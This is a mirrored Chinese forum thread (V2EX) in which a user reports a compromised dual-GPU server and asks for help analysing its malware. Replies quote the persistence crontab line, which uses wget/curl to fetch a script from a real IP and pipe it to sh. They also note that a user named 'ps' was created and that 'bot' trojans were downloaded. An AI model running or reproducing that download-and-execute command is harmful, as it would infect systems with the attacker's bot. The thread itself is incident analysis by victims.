8
一个双显卡服务器被入侵了,他会定时从下载脚本并执行
source link: https://www.v2ex.com/t/787835
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
一个双显卡服务器被入侵了,他会定时从下载脚本并执行 - V2EX
http://185.150.117.29/x/b
帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
14 条回复 • 2021-07-07 09:58:50 +08:00
rwecho 21 小时 50 分钟前
15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh
它在电脑里面创建了一个用户名为:ps
然后里面有一个 crontab 命令
它在电脑里面创建了一个用户名为:ps
然后里面有一个 crontab 命令
longbow0 21 小时 37 分钟前
主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.*
其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html
其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html
CaffreySun 21 小时 19 分钟前
这个脚步比较简单,就是“感染”你的服务器,并且创建定时任务重复“感染”。
至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。
或许用来挖坑。
或许用来执行网络攻击。
至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。
或许用来挖坑。
或许用来执行网络攻击。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK